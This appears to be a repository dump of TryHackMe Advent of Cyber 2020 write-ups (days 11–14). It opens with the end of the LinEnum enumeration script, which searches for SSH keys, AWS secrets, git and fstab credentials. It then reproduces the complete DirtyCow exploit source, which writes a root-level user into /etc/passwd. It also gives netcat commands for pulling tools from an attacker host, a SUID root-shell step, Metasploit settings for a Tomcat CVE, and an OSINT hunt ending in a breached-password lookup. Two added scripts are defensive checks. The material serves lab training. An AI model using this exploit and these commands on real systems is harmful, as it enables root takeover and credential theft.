userswithcaps=`grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null`
if [ "$userswithcaps" ]; then
echo -e "\e[00;33m[+] Users with specific POSIX capabilities:\e[00m\n$userswithcaps"
echo -e "\n"
fi
if [ "$userswithcaps" ] ; then
#matches the capabilities found associated with users with the current user
matchedcaps=`echo -e "$userswithcaps" | grep \`whoami\` | awk '{print $1}' 2>/dev/null`
if [ "$matchedcaps" ]; then
echo -e "\e[00;33m[+] Capabilities associated with the current user:\e[00m\n$matchedcaps"
echo -e "\n"
#matches the files with capabilities against the capabilities associated with the current user
matchedfiles=`echo -e "$matchedcaps" | while read -r cap ; do echo -e "$fileswithcaps" | grep "$cap" ; done 2>/dev/null`
if [ "$matchedfiles" ]; then
echo -e "\e[00;33m[+] Files with the same capabilities associated with the current user (You may want to try abusing those capabilties):\e[00m\n$matchedfiles"
echo -e "\n"
#lists the permissions of the files having the same capabilities associated with the current user
matchedfilesperms=`echo -e "$matchedfiles" | awk '{print $1}' | while read -r f; do ls -la $f ;done 2>/dev/null`
echo -e "\e[00;33m[+] Permissions of files with the same capabilities associated with the current user:\e[00m\n$matchedfilesperms"
echo -e "\n"
if [ "$matchedfilesperms" ]; then
#checks if any of the files with same capabilities associated with the current user is writable
writablematchedfiles=`echo -e "$matchedfiles" | awk '{print $1}' | while read -r f; do find $f -writable -exec ls -la {} + ;done 2>/dev/null`
if [ "$writablematchedfiles" ]; then
echo -e "\e[00;33m[+] User/Group writable files with the same capabilities associated with the current user:\e[00m\n$writablematchedfiles"
echo -e "\n"
fi
fi
fi
fi
fi
#look for private keys - thanks djhohnstein
if [ "$thorough" = "1" ]; then
privatekeyfiles=`grep -rl "PRIVATE KEY-----" /home 2>/dev/null`
if [ "$privatekeyfiles" ]; then
echo -e "\e[00;33m[+] Private SSH keys found!:\e[00m\n$privatekeyfiles"
echo -e "\n"
fi
fi
#look for AWS keys - thanks djhohnstein
if [ "$thorough" = "1" ]; then
awskeyfiles=`grep -rli "aws_secret_access_key" /home 2>/dev/null`
if [ "$awskeyfiles" ]; then
echo -e "\e[00;33m[+] AWS secret keys found!:\e[00m\n$awskeyfiles"
echo -e "\n"
fi
fi
#look for git credential files - thanks djhohnstein
if [ "$thorough" = "1" ]; then
gitcredfiles=`find / -name ".git-credentials" 2>/dev/null`
if [ "$gitcredfiles" ]; then
echo -e "\e[00;33m[+] Git credentials saved on the machine!:\e[00m\n$gitcredfiles"
echo -e "\n"
fi
fi
#list all world-writable files excluding /proc and /sys
if [ "$thorough" = "1" ]; then
wwfiles=`find / ! -path "*/proc/*" ! -path "/sys/*" -perm -2 -type f -exec ls -la {} 2>/dev/null \;`
if [ "$wwfiles" ]; then
echo -e "\e[00;31m[-] World-writable files (excluding /proc and /sys):\e[00m\n$wwfiles"
echo -e "\n"
fi
fi
if [ "$thorough" = "1" ]; then
if [ "$export" ] && [ "$wwfiles" ]; then
mkdir $format/ww-files/ 2>/dev/null
for i in $wwfiles; do cp --parents $i $format/ww-files/; done 2>/dev/null
fi
fi
#are any .plan files accessible in /home (could contain useful information)
usrplan=`find /home -iname *.plan -exec ls -la {} \; -exec cat {} 2>/dev/null \;`
if [ "$usrplan" ]; then
echo -e "\e[00;31m[-] Plan file permissions and contents:\e[00m\n$usrplan"
echo -e "\n"
fi
if [ "$export" ] && [ "$usrplan" ]; then
mkdir $format/plan_files/ 2>/dev/null
for i in $usrplan; do cp --parents $i $format/plan_files/; done 2>/dev/null
fi
bsdusrplan=`find /usr/home -iname *.plan -exec ls -la {} \; -exec cat {} 2>/dev/null \;`
if [ "$bsdusrplan" ]; then
echo -e "\e[00;31m[-] Plan file permissions and contents:\e[00m\n$bsdusrplan"
echo -e "\n"
fi
if [ "$export" ] && [ "$bsdusrplan" ]; then
mkdir $format/plan_files/ 2>/dev/null
for i in $bsdusrplan; do cp --parents $i $format/plan_files/; done 2>/dev/null
fi
#are there any .rhosts files accessible - these may allow us to login as another user etc.
rhostsusr=`find /home -iname *.rhosts -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;`
if [ "$rhostsusr" ]; then
echo -e "\e[00;33m[+] rhost config file(s) and file contents:\e[00m\n$rhostsusr"
echo -e "\n"
fi
if [ "$export" ] && [ "$rhostsusr" ]; then
mkdir $format/rhosts/ 2>/dev/null
for i in $rhostsusr; do cp --parents $i $format/rhosts/; done 2>/dev/null
fi
bsdrhostsusr=`find /usr/home -iname *.rhosts -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;`
if [ "$bsdrhostsusr" ]; then
echo -e "\e[00;33m[+] rhost config file(s) and file contents:\e[00m\n$bsdrhostsusr"
echo -e "\n"
fi
if [ "$export" ] && [ "$bsdrhostsusr" ]; then
mkdir $format/rhosts 2>/dev/null
for i in $bsdrhostsusr; do cp --parents $i $format/rhosts/; done 2>/dev/null
fi
rhostssys=`find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;`
if [ "$rhostssys" ]; then
echo -e "\e[00;33m[+] Hosts.equiv file and contents: \e[00m\n$rhostssys"
echo -e "\n"
fi
if [ "$export" ] && [ "$rhostssys" ]; then
mkdir $format/rhosts/ 2>/dev/null
for i in $rhostssys; do cp --parents $i $format/rhosts/; done 2>/dev/null
fi
#list nfs shares/permissions etc.
nfsexports=`ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null`
if [ "$nfsexports" ]; then
echo -e "\e[00;31m[-] NFS config details: \e[00m\n$nfsexports"
echo -e "\n"
fi
if [ "$export" ] && [ "$nfsexports" ]; then
mkdir $format/etc-export/ 2>/dev/null
cp /etc/exports $format/etc-export/exports 2>/dev/null
fi
if [ "$thorough" = "1" ]; then
#phackt
#displaying /etc/fstab
fstab=`cat /etc/fstab 2>/dev/null`
if [ "$fstab" ]; then
echo -e "\e[00;31m[-] /etc/fstab partitions and filesystems - check for NFS mounts and exotic filesystems:\e[00m"
echo -e "$fstab"
echo -e "\n"
fi
fi
#looking for credentials in /etc/fstab
fstab=`grep username /etc/fstab 2>/dev/null |awk '{sub(/.*\username=/,"");sub(/\,.*/,"")}1' 2>/dev/null| xargs -r echo username: 2>/dev/null; grep password /etc/fstab 2>/dev/null |awk '{sub(/.*\password=/,"");sub(/\,.*/,"")}1' 2>/dev/null| xargs -r echo password: 2>/dev/null; grep domain /etc/fstab 2>/dev/null |awk '{sub(/.*\domain=/,"");sub(/\,.*/,"")}1' 2>/dev/null| xargs -r echo domain: 2>/dev/null`
if [ "$fstab" ]; then
echo -e "\e[00;33m[+] Looks like there are credentials in /etc/fstab!\e[00m\n$fstab"
echo -e "\n"
fi
if [ "$export" ] && [ "$fstab" ]; then
mkdir $format/etc-exports/ 2>/dev/null
cp /etc/fstab $format/etc-exports/fstab 2>/dev/null
fi
fstabcred=`grep cred /etc/fstab 2>/dev/null |awk '{sub(/.*\credentials=/,"");sub(/\,.*/,"")}1' 2>/dev/null | xargs -I{} sh -c 'ls -la {}; cat {}' 2>/dev/null`
if [ "$fstabcred" ]; then
echo -e "\e[00;33m[+] /etc/fstab contains a credentials file!\e[00m\n$fstabcred"
echo -e "\n"
fi
if [ "$export" ] && [ "$fstabcred" ]; then
mkdir $format/etc-exports/ 2>/dev/null
cp /etc/fstab $format/etc-exports/fstab 2>/dev/null
fi
#use supplied keyword and cat *.conf files for potential matches - output will show line number within relevant file path where a match has been located
if [ "$keyword" = "" ]; then
echo -e "[-] Can't search *.conf files as no keyword was entered\n"
else
confkey=`find / -maxdepth 4 -name *.conf -type f -exec grep -Hn $keyword {} \; 2>/dev/null`
if [ "$confkey" ]; then
echo -e "\e[00;31m[-] Find keyword ($keyword) in .conf files (recursive 4 levels - output format filepath:identified line number where keyword appears):\e[00m\n$confkey"
echo -e "\n"
else
echo -e "\e[00;31m[-] Find keyword ($keyword) in .conf files (recursive 4 levels):\e[00m"
echo -e "'$keyword' not found in any .conf files"
echo -e "\n"
fi
fi
if [ "$keyword" = "" ]; then
:
else
if [ "$export" ] && [ "$confkey" ]; then
confkeyfile=`find / -maxdepth 4 -name *.conf -type f -exec grep -lHn $keyword {} \; 2>/dev/null`
mkdir --parents $format/keyword_file_matches/config_files/ 2>/dev/null
for i in $confkeyfile; do cp --parents $i $format/keyword_file_matches/config_files/ ; done 2>/dev/null
fi
fi
#use supplied keyword and cat *.php files for potential matches - output will show line number within relevant file path where a match has been located
if [ "$keyword" = "" ]; then
echo -e "[-] Can't search *.php files as no keyword was entered\n"
else
phpkey=`find / -maxdepth 10 -name *.php -type f -exec grep -Hn $keyword {} \; 2>/dev/null`
if [ "$phpkey" ]; then
echo -e "\e[00;31m[-] Find keyword ($keyword) in .php files (recursive 10 levels - output format filepath:identified line number where keyword appears):\e[00m\n$phpkey"
echo -e "\n"
else
echo -e "\e[00;31m[-] Find keyword ($keyword) in .php files (recursive 10 levels):\e[00m"
echo -e "'$keyword' not found in any .php files"
echo -e "\n"
fi
fi
if [ "$keyword" = "" ]; then
:
else
if [ "$export" ] && [ "$phpkey" ]; then
phpkeyfile=`find / -maxdepth 10 -name *.php -type f -exec grep -lHn $keyword {} \; 2>/dev/null`
mkdir --parents $format/keyword_file_matches/php_files/ 2>/dev/null
for i in $phpkeyfile; do cp --parents $i $format/keyword_file_matches/php_files/ ; done 2>/dev/null
fi
fi
#use supplied keyword and cat *.log files for potential matches - output will show line number within relevant file path where a match has been located
if [ "$keyword" = "" ];then
echo -e "[-] Can't search *.log files as no keyword was entered\n"
else
logkey=`find / -maxdepth 4 -name *.log -type f -exec grep -Hn $keyword {} \; 2>/dev/null`
if [ "$logkey" ]; then
echo -e "\e[00;31m[-] Find keyword ($keyword) in .log files (recursive 4 levels - output format filepath:identified line number where keyword appears):\e[00m\n$logkey"
echo -e "\n"
else
echo -e "\e[00;31m[-] Find keyword ($keyword) in .log files (recursive 4 levels):\e[00m"
echo -e "'$keyword' not found in any .log files"
echo -e "\n"
fi
fi
if [ "$keyword" = "" ];then
:
else
if [ "$export" ] && [ "$logkey" ]; then
logkeyfile=`find / -maxdepth 4 -name *.log -type f -exec grep -lHn $keyword {} \; 2>/dev/null`
mkdir --parents $format/keyword_file_matches/log_files/ 2>/dev/null
for i in $logkeyfile; do cp --parents $i $format/keyword_file_matches/log_files/ ; done 2>/dev/null
fi
fi
#use supplied keyword and cat *.ini files for potential matches - output will show line number within relevant file path where a match has been located
if [ "$keyword" = "" ];then
echo -e "[-] Can't search *.ini files as no keyword was entered\n"
else
inikey=`find / -maxdepth 4 -name *.ini -type f -exec grep -Hn $keyword {} \; 2>/dev/null`
if [ "$inikey" ]; then
echo -e "\e[00;31m[-] Find keyword ($keyword) in .ini files (recursive 4 levels - output format filepath:identified line number where keyword appears):\e[00m\n$inikey"
echo -e "\n"
else
echo -e "\e[00;31m[-] Find keyword ($keyword) in .ini files (recursive 4 levels):\e[00m"
echo -e "'$keyword' not found in any .ini files"
echo -e "\n"
fi
fi
if [ "$keyword" = "" ];then
:
else
if [ "$export" ] && [ "$inikey" ]; then
inikey=`find / -maxdepth 4 -name *.ini -type f -exec grep -lHn $keyword {} \; 2>/dev/null`
mkdir --parents $format/keyword_file_matches/ini_files/ 2>/dev/null
for i in $inikey; do cp --parents $i $format/keyword_file_matches/ini_files/ ; done 2>/dev/null
fi
fi
#quick extract of .conf files from /etc - only 1 level
allconf=`find /etc/ -maxdepth 1 -name *.conf -type f -exec ls -la {} \; 2>/dev/null`
if [ "$allconf" ]; then
echo -e "\e[00;31m[-] All *.conf files in /etc (recursive 1 level):\e[00m\n$allconf"
echo -e "\n"
fi
if [ "$export" ] && [ "$allconf" ]; then
mkdir $format/conf-files/ 2>/dev/null
for i in $allconf; do cp --parents $i $format/conf-files/; done 2>/dev/null
fi
#extract any user history files that are accessible
usrhist=`ls -la ~/.*_history 2>/dev/null`
if [ "$usrhist" ]; then
echo -e "\e[00;31m[-] Current user's history files:\e[00m\n$usrhist"
echo -e "\n"
fi
if [ "$export" ] && [ "$usrhist" ]; then
mkdir $format/history_files/ 2>/dev/null
for i in ~/.*_history; do cp --parents $i $format/history_files/; done 2>/dev/null
fi
#can we read roots *_history files - could be passwords stored etc.
roothist=`ls -la /root/.*_history 2>/dev/null`
if [ "$roothist" ]; then
echo -e "\e[00;33m[+] Root's history files are accessible!\e[00m\n$roothist"
echo -e "\n"
fi
if [ "$export" ] && [ "$roothist" ]; then
mkdir $format/history_files/ 2>/dev/null
cp /root/.*_history $format/history_files/ 2>/dev/null
fi
#all accessible .bash_history files in /home
checkbashhist=`find /home -name .bash_history -print -exec cat {} 2>/dev/null \;`
if [ "$checkbashhist" ]; then
echo -e "\e[00;31m[-] Location and contents (if accessible) of .bash_history file(s):\e[00m\n$checkbashhist"
echo -e "\n"
fi
#any .bak files that may be of interest
bakfiles=`find / -name "*.bak" -type f 2>/dev/null`
if [ "$bakfiles" ]; then
echo -e "\e[00;31m[-] Location and Permissions (if accessible) of .bak file(s):\e[00m"
for bak in `echo $bakfiles`; do ls -la $bak;done
echo -e "\n"
fi
#is there any mail accessible
readmail=`ls -la /var/mail 2>/dev/null`
if [ "$readmail" ]; then
echo -e "\e[00;31m[-] Any interesting mail in /var/mail:\e[00m\n$readmail"
echo -e "\n"
fi
#can we read roots mail
readmailroot=`head /var/mail/root 2>/dev/null`
if [ "$readmailroot" ]; then
echo -e "\e[00;33m[+] We can read /var/mail/root! (snippet below)\e[00m\n$readmailroot"
echo -e "\n"
fi
if [ "$export" ] && [ "$readmailroot" ]; then
mkdir $format/mail-from-root/ 2>/dev/null
cp /var/mail/root $format/mail-from-root/ 2>/dev/null
fi
}
docker_checks()
{
#specific checks - check to see if we're in a docker container
dockercontainer=` grep -i docker /proc/self/cgroup 2>/dev/null; find / -name "*dockerenv*" -exec ls -la {} \; 2>/dev/null`
if [ "$dockercontainer" ]; then
echo -e "\e[00;33m[+] Looks like we're in a Docker container:\e[00m\n$dockercontainer"
echo -e "\n"
fi
#specific checks - check to see if we're a docker host
dockerhost=`docker --version 2>/dev/null; docker ps -a 2>/dev/null`
if [ "$dockerhost" ]; then
echo -e "\e[00;33m[+] Looks like we're hosting Docker:\e[00m\n$dockerhost"
echo -e "\n"
fi
#specific checks - are we a member of the docker group
dockergrp=`id | grep -i docker 2>/dev/null`
if [ "$dockergrp" ]; then
echo -e "\e[00;33m[+] We're a member of the (docker) group - could possibly misuse these rights!\e[00m\n$dockergrp"
echo -e "\n"
fi
#specific checks - are there any docker files present
dockerfiles=`find / -name Dockerfile -exec ls -l {} 2>/dev/null \;`
if [ "$dockerfiles" ]; then
echo -e "\e[00;31m[-] Anything juicy in the Dockerfile:\e[00m\n$dockerfiles"
echo -e "\n"
fi
#specific checks - are there any docker files present
dockeryml=`find / -name docker-compose.yml -exec ls -l {} 2>/dev/null \;`
if [ "$dockeryml" ]; then
echo -e "\e[00;31m[-] Anything juicy in docker-compose.yml:\e[00m\n$dockeryml"
echo -e "\n"
fi
}
lxc_container_checks()
{
#specific checks - are we in an lxd/lxc container
lxccontainer=`tr '\0' '\n' 2>/dev/null < /proc/1/environ | grep -a container=lxc 2>/dev/null`
if [ "$lxccontainer" ]; then
echo -e "\e[00;33m[+] Looks like we're in a lxc container:\e[00m\n$lxccontainer"
echo -e "\n"
fi
#specific checks - are we a member of the lxd group
lxdgroup=`id | grep -i lxd 2>/dev/null`
if [ "$lxdgroup" ]; then
echo -e "\e[00;33m[+] We're a member of the (lxd) group - could possibly misuse these rights!\e[00m\n$lxdgroup"
echo -e "\n"
fi
}
footer()
{
echo -e "\e[00;33m### SCAN COMPLETE ####################################\e[00m"
}
call_each()
{
header
debug_info
system_info
user_info
environmental_info
job_info
networking_info
services_info
software_configs
interesting_files
docker_checks
lxc_container_checks
footer
}
while getopts "h:k:r:e:st" option; do
case "${option}" in
k) keyword=${OPTARG};;
r) report=${OPTARG}"-"`date +"%d-%m-%y"`;;
e) export=${OPTARG};;
s) sudopass=1;;
t) thorough=1;;
h) usage; exit;;
*) usage; exit;;
esac
done
call_each | tee -a $report 2> /dev/null
#EndOfScript
================================================
FILE: Advent-of-Cyber-2020/Day-11-The_Rogue_Gnome/README.md
================================================
# The Rogue Gnome
Before we begin, we're going to need to deploy two Instances:
1. The THM AttackBox by pressing the "Start AttackBox" button at the top-right of the page.
2. The vulnerable Instance attached to this task by pressing the "Deploy" button at the top-right of this task/day.
- What type of privilege escalation involves using a user account to execute commands as an administrator?
- `vertical`
- What is the name of the file that contains a list of users who are a part of the sudo group?
- `sudoers`
- Use SSH to log in to the vulnerable machine like so: ssh cmnatic@MACHINE_IP
Input the following password when prompted: aoc2020
no answer needed
- Enumerate the machine for executables that have had the SUID permission set. Look at the output and use a mixture of GTFObins and your researching skills to learn how to exploit this binary.
You may find uploading some of the enumeration scripts that were used during today's task to be useful.
no answer needed
- On your machine `wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh`
- `nc -lvnp 4444 < LinEnum.sh`
- On target `nc -w 3 <YOUR_IP> 4444 > LinEnum.sh`
- On target `chmod +x LinEnum.sh && ./LinEnum.sh`
- In the SUID files section we can see that `/bin/bash` has the SUID bit set. Good.
- The same could be found with `find / -perm -u=s -type f 2>/dev/null`
- On target `bash -p` (`-p` stops bash from dropping the effective UID back to the real one, so the shell keeps running as root)
- `cat /root/flag.txt`
- Use this executable to launch a system shell as root.
What are the contents of the file located at /root/flag.txt?
- `thm{*****************}`
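Added example (not from the room or from LinEnum): a small POSIX shell script that does the SUID enumeration above and, like LinEnum's "possibly interesting SUID files" check, flags names that GTFOBins lists as shell-spawning when setuid. It also reports SUID files that are world-writable, which are critical regardless of name. The `INTERESTING_SUID` list is a constructed subset; extend it from https://gtfobins.github.io.

```sh
#!/bin/sh
# Added example, not part of the TryHackMe room or of LinEnum: enumerate
# setuid binaries under a directory tree and flag the ones whose name is
# in a list of binaries that GTFOBins documents as giving a shell when SUID.
# INTERESTING_SUID is a constructed subset of that list; extend it as needed.

INTERESTING_SUID="bash sh dash zsh ksh find vim vi nano env python python3 perl less more awk gawk cp mv tar nmap"

# list_suid ROOT: every regular file under ROOT with the setuid bit set
# (-xdev stays on one filesystem; unreadable directories are skipped quietly).
list_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null
}

# is_interesting NAME: succeeds when NAME is one of the INTERESTING_SUID words.
is_interesting() {
    for _name in $INTERESTING_SUID; do
        [ "$_name" = "$1" ] && return 0
    done
    return 1
}

# flag_suid ROOT: print "<owner uid> <path>" for each SUID file whose basename
# is in INTERESTING_SUID. An owner uid of 0 means running it yields a root
# shell (`bash -p`, `find . -exec /bin/sh -p \;`, and so on per GTFOBins).
flag_suid() {
    list_suid "$1" | while IFS= read -r path; do
        if is_interesting "$(basename "$path")"; then
            printf '%s %s\n' "$(ls -ln "$path" | awk '{print $3}')" "$path"
        fi
    done
}

# writable_suid ROOT: SUID files that are also world-writable; any user can
# replace their contents while the setuid bit stays set.
writable_suid() {
    find "$1" -xdev -type f -perm -4002 2>/dev/null
}

# Run against a tree given on the command line, e.g. `sh suid_check.sh /`.
if [ $# -gt 0 ]; then
    echo "[+] Possibly interesting SUID files (uid path):"
    flag_suid "$1"
    echo "[+] World-writable SUID files:"
    writable_suid "$1"
fi
```

Run it as `sh suid_check.sh /` on the target; a flagged entry with uid `0` is the one to look up on GTFOBins, which is how `/bin/bash` turns into `bash -p` above.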
## see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-12-Ready,_set,_elf./README.md
================================================
# Ready, set, elf.
- What is the version number of the web server?
- `nmap -sV <TARGET_IP>` (Remember, if it says "host seems down", use `-Pn`, look for what it means)
- `9.0.17`
- What CVE can be used to create a Meterpreter entry onto the machine? (Format: CVE-XXXX-XXXX)
- `msfconsole`
- `search tomcat 9`
- It lists `exploit/windows/http/tomcat_cgi_cmdlineargs` (disclosure date 2019-04-10); a quick search maps that module to its CVE.
- `CVE-2019-0232`
- Set your Metasploit settings appropriately and gain a foothold onto the deployed machine.
no answer needed
- After the search it should list only one exploit; select it with `use 0` (or the appropriate index if there are several)
- `set RHOSTS <TARGET_IP>`
- `set RPORT 8080`
- `set LHOST <YOUR_IP>`
- `set targeturi /cgi-bin/elfwhacker.bat`
- `run` or `exploit`
- What are the contents of flag1.txt?
- `cat flag1.txt`
- `thm{********_***_***_*****}`
- Looking for a challenge? Try to find out some of the vulnerabilities present to escalate your privileges!
no answer needed
================================================
FILE: Advent-of-Cyber-2020/Day-13-Coal_for_Christmas/README.md
================================================
# Coal for Christmas
- Hi Santa, hop in your sleigh and deploy this machine!
no answer needed
- nmap <TARGET_IP>
no answer needed
- `nmap <TARGET_IP>`
- What old, deprecated protocol and service is running?
- `telnet`
- What credential was left for you?
- `telnet <TARGET_IP> 23`
- `clauschristmas`
- What distribution of Linux and version number is this server running?
- `uname -a`, then `cat /etc/issue` for the release name and version
- `Ubuntu 12.04`
- Who got here first?
- `cat cookies_and_milk.txt`
- `grinch`
- This cookies_and_milk.txt file looks like a modified rendition of a DirtyCow exploit, usually written in C. Find a copy of that original file online, and get it on the target box. You can do this with some simple file transfer methods like netcat, or spinning up a quick Python HTTP server... or you can simply copy-and-paste it into a text editor on the box!
no answer needed
- [dirtycow](https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c)
- On your machine `nc -lnvp 4444 < dirty.c`
- On target `nc -w 3 <YOUR_IP> 4444 > dirty.c`
- What is the verbatim syntax you can use to compile, taken from the real C source code comments?
- `gcc -pthread dirty.c -o dirty -lcrypt`
- Run the commands to compile the exploit, and run it.
What "new" username was created, with the default operations of the real C source code?
- `./dirty` and then enter the password you've chosen; log in with `su firefart` using that password (and restore `/etc/passwd` from `/tmp/passwd.bak` when you are done)
- `firefart`
- What is the MD5 hash output?
- `cat message_from_the_grinch.txt`
- `touch coal`
- `tree | md5sum`
- `********************************`
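Added example (not from the room or from dirty.c): once the exploit has run, the new `firefart` line is exactly the kind of artefact a defender looks for. This POSIX shell script scans a passwd file for extra UID-0 accounts, for hashes stored in passwd instead of shadow, for malformed lines, and for lines added relative to the backup that dirty.c writes to `/tmp/passwd.bak`. `PASSWD_SAMPLE` and its hash value are constructed for the demo.

```sh
#!/bin/sh
# Added example, not part of the TryHackMe room or of dirty.c: checks on a
# passwd file for the artefacts a DirtyCow-style overwrite leaves behind:
# a second UID-0 account, a password hash stored in passwd instead of shadow,
# and lines that no longer have seven fields.
# PASSWD_SAMPLE and the "fi..." hash are constructed for this demo.

PASSWD_SAMPLE='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
firefart:fi9Xq2LmN0pQr:0:0:pwned:/root:/bin/bash
santa:x:1000:1000:Santa Claus:/home/santa:/bin/bash
this line is not a passwd entry'

# uid0_accounts FILE: usernames other than root whose UID field is 0.
uid0_accounts() {
    awk -F: 'NF == 7 && $3 == 0 && $1 != "root" { print $1 }' "$1"
}

# hashed_in_passwd FILE: users whose password field holds a hash rather than
# the "x" / "*" / "!" placeholder, i.e. a crackable hash in a world-readable file.
hashed_in_passwd() {
    awk -F: 'NF == 7 && $2 != "x" && $2 != "*" && $2 != "!" && $2 != "" { print $1 }' "$1"
}

# malformed_lines FILE: line numbers that do not have exactly seven fields.
malformed_lines() {
    awk -F: 'NF != 7 { print NR }' "$1"
}

# added_since BACKUP CURRENT: lines of CURRENT that do not appear verbatim in
# BACKUP, e.g. what dirty.c injected relative to /tmp/passwd.bak.
# grep exits 1 when nothing differs, which is not an error here.
added_since() {
    grep -v -x -F -f "$1" "$2" || true
}

# passwd_report FILE: print all findings for FILE.
passwd_report() {
    echo "[+] UID-0 accounts besides root:"; uid0_accounts "$1"
    echo "[+] Accounts with a hash in passwd:"; hashed_in_passwd "$1"
    echo "[+] Malformed line numbers:"; malformed_lines "$1"
}

# Report on a file given as $1 (e.g. `sh passwd_check.sh /etc/passwd`),
# otherwise on the constructed sample.
if [ $# -gt 0 ]; then
    passwd_report "$1"
else
    sample=$(mktemp); printf '%s\n' "$PASSWD_SAMPLE" > "$sample"
    passwd_report "$sample"; rm -f "$sample"
fi
```

On the box, `sh passwd_check.sh /etc/passwd` after the exploit reports `firefart` under both the UID-0 and hash checks, and `added_since /tmp/passwd.bak /etc/passwd` prints the injected line; a clean report after `mv /tmp/passwd.bak /etc/passwd` confirms the restore.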
### see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-13-Coal_for_Christmas/dirty.c
================================================
//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak
// and overwrites the root account with the generated line.
// After running the exploit you should be able to login with the newly
// created user.
//
// To use this exploit modify the user values according to your needs.
// The default is "firefart".
//
// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// Compile with:
// gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
// "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su firefart" or "ssh firefart@..."
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
// mv /tmp/passwd.bak /etc/passwd
//
// Exploit adopted by Christian "FireFart" Mehlmauer
// https://firefart.at
//
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <stdlib.h>
#include <unistd.h>
#include <crypt.h>
#include <signal.h> // kill() and SIGSTOP
const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
const char *salt = "firefart";
int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;
struct Userinfo {
char *username;
char *hash;
int user_id;
int group_id;
char *info;
char *home_dir;
char *shell;
};
char *generate_password_hash(char *plaintext_pw) {
return crypt(plaintext_pw, salt);
}
char *generate_passwd_line(struct Userinfo u) {
const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
int size = snprintf(NULL, 0, format, u.username, u.hash,
u.user_id, u.group_id, u.info, u.home_dir, u.shell);
char *ret = malloc(size + 1);
sprintf(ret, format, u.username, u.hash, u.user_id,
u.group_id, u.info, u.home_dir, u.shell);
return ret;
}
void *madviseThread(void *arg) {
int i, c = 0;
for(i = 0; i < 200000000; i++) {
c += madvise(map, 100, MADV_DONTNEED);
}
printf("madvise %d\n\n", c);
return NULL; // thread routine must return a value
}
int copy_file(const char *from, const char *to) {
// check if target file already exists
if(access(to, F_OK) != -1) {
printf("File %s already exists! Please delete it and run again\n",
to);
return -1;
}
int ch; // int, not char: EOF (-1) must stay distinguishable from byte 0xFF
FILE *source, *target;
source = fopen(from, "r");
if(source == NULL) {
return -1;
}
target = fopen(to, "w");
if(target == NULL) {
fclose(source);
return -1;
}
while((ch = fgetc(source)) != EOF) {
fputc(ch, target);
}
printf("%s successfully backed up to %s\n",
from, to);
fclose(source);
fclose(target);
return 0;
}
int main(int argc, char *argv[])
{
// backup file
int ret = copy_file(filename, backup_filename);
if (ret != 0) {
exit(ret);
}
struct Userinfo user;
// set values, change as needed
user.username = "firefart";
user.user_id = 0;
user.group_id = 0;
user.info = "pwned";
user.home_dir = "/root";
user.shell = "/bin/bash";
char *plaintext_pw;
if (argc >= 2) {
plaintext_pw = argv[1];
printf("Please enter the new password: %s\n", plaintext_pw);
} else {
plaintext_pw = getpass("Please enter the new password: ");
}
user.hash = generate_password_hash(plaintext_pw);
char *complete_passwd_line = generate_passwd_line(user);
printf("Complete line:\n%s\n", complete_passwd_line);
f = open(filename, O_RDONLY);
fstat(f, &st);
map = mmap(NULL,
st.st_size + sizeof(long),
PROT_READ,
MAP_PRIVATE,
f,
0);
printf("mmap: %lx\n",(unsigned long)map);
pid = fork();
if(pid) {
waitpid(pid, NULL, 0);
int u, i, o, c = 0;
int l=strlen(complete_passwd_line);
for(i = 0; i < 10000/l; i++) {
for(o = 0; o < l; o++) {
for(u = 0; u < 10000; u++) {
c += ptrace(PTRACE_POKETEXT,
pid,
map + o,
*((long*)(complete_passwd_line + o)));
}
}
}
printf("ptrace %d\n",c);
}
else {
pthread_create(&pth,
NULL,
madviseThread,
NULL);
ptrace(PTRACE_TRACEME);
kill(getpid(), SIGSTOP);
pthread_join(pth,NULL);
}
printf("Done! Check %s to see if the new user was created.\n", filename);
printf("You can log in with the username '%s' and the password '%s'.\n\n",
user.username, plaintext_pw);
printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",
backup_filename, filename);
return 0;
}
================================================
FILE: Advent-of-Cyber-2020/Day-14-Where's Rudolph?/README.md
================================================
# Where's Rudolph?
- What URL will take me directly to Rudolph's Reddit comment history?
- Google is your best friend. `https://www.reddit.com/user/IGuidetheClaus2020/comments/`
- According to Rudolph, where was he born?
- `Chicago`
- Rudolph mentions Robert. Can you use Google to tell me Robert's last name?
- Google is your friend.. `May`
- On what other social media platform might Rudolph have an account?
- Twitter Search
- `https://twitter.com/IGuideClaus2020`
- `twitter`
- What is Rudolph's username on that platform?
- `IGuideClaus2020`
- What appears to be Rudolph's favorite TV show right now?
- `bachelorette`, from his Twitter feed.
- Based on Rudolph's post history, he took part in a parade. Where did the parade take place?
- `Chicago`
- Okay, you found the city, but where specifically was one of the photos taken?
- [photo with higher resolution](https://twitter.com/IGuideClaus2020/status/1331615839318138883)
- Upload on [exif.regex.info](http://exif.regex.info)
- `41.891815, -87.624277`
- Did you find a flag too?
- `{FLAG}**********************`
- Has Rudolph been pwned? What password of his appeared in a breach?
- [Scylla Search](https://scylla.sh/api)
- The email is shown on Twitter `rudolphthered@hotmail.com`.
- `*******`
